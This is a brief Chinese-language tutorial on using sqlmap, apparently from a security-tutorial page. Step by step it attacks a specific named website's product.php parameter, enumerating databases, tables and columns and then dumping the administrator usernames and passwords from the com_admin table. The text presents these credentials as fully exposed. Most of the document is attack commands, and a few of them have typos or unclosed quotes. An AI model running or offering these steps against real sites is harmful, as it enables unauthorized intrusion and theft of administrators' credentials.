sqlmap的使用
更新:HHH   时间:2023-1-7



sqlmap进行注入

1、用扫描工具可以扫出注入点这里我用一个注入点进行说明。

sqlamp.py -u “http://www.gaoneng.com/product.php?cid=71

 

可以看出此处存在sql注入漏洞。

2

sqlmap.py -u “http://www.gaoneng.com/product.php?cid=71

--dbs 可以跑出存在的数据库名

 

然后可以跑gaoneng数据库中的表

Sqlmap.py -u”http://www.gaoneng.com/product.php?cid=71 -D gaoneng --tables

 

既然已经爆出数据库里的表,那就可以爆出表中的字段

Sqlmap.py -u “http://www.gaoneng.com/product.php?cid=71

-D gaoneng -T com_admin --columns

 

可以看到这个表中存在我们需要的字段,密码与用户名

Sqlmap.py -u “http://www.gaoneng.com/product.php?cid=71 

-D gaoneng -T com_admin -C username,password --dump

 

由此这个网站的管理员密码与用户名已被完全爆出。


返回安全技术教程...